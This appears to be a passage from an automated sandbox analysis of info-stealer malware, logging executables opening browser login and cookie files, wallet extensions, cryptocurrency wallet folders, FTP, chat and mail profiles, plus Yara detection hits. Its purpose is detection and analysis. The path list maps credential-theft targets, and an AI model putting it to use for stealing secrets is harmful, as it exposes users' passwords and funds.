Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\rjKMaHWEjHxrAXnmaImAvrxNrHOchwuelXkCKuIwTZIWy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\Google\Chrome\Application\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000055001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\4d0ab15804\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000056001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000187001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000188001\.purple\accounts.xml
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 831840b410.exe, 00000010.00000003.3096661505.0000000001061000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP`
Source: 831840b410.exe, 0000002F.00000003.3472622791.000000000192C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP
Source: 831840b410.exe, 0000002F.00000000.3200529574.0000000000D62000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 831840b410.exe, 0000001F.00000003.3233691066.0000000001849000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XPo/
Source: Yara match File source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
Source: Yara match File source: 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000002.3372562116.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072924932.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.3293720784.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2990613852.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c884f8452a.exe PID: 7988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 1864, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\L6h0MKsU674R9uRTEifr_26.zip, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\lGaQRZaI9ZBmSkbqM2Ghh6s.zip, type: DROPPED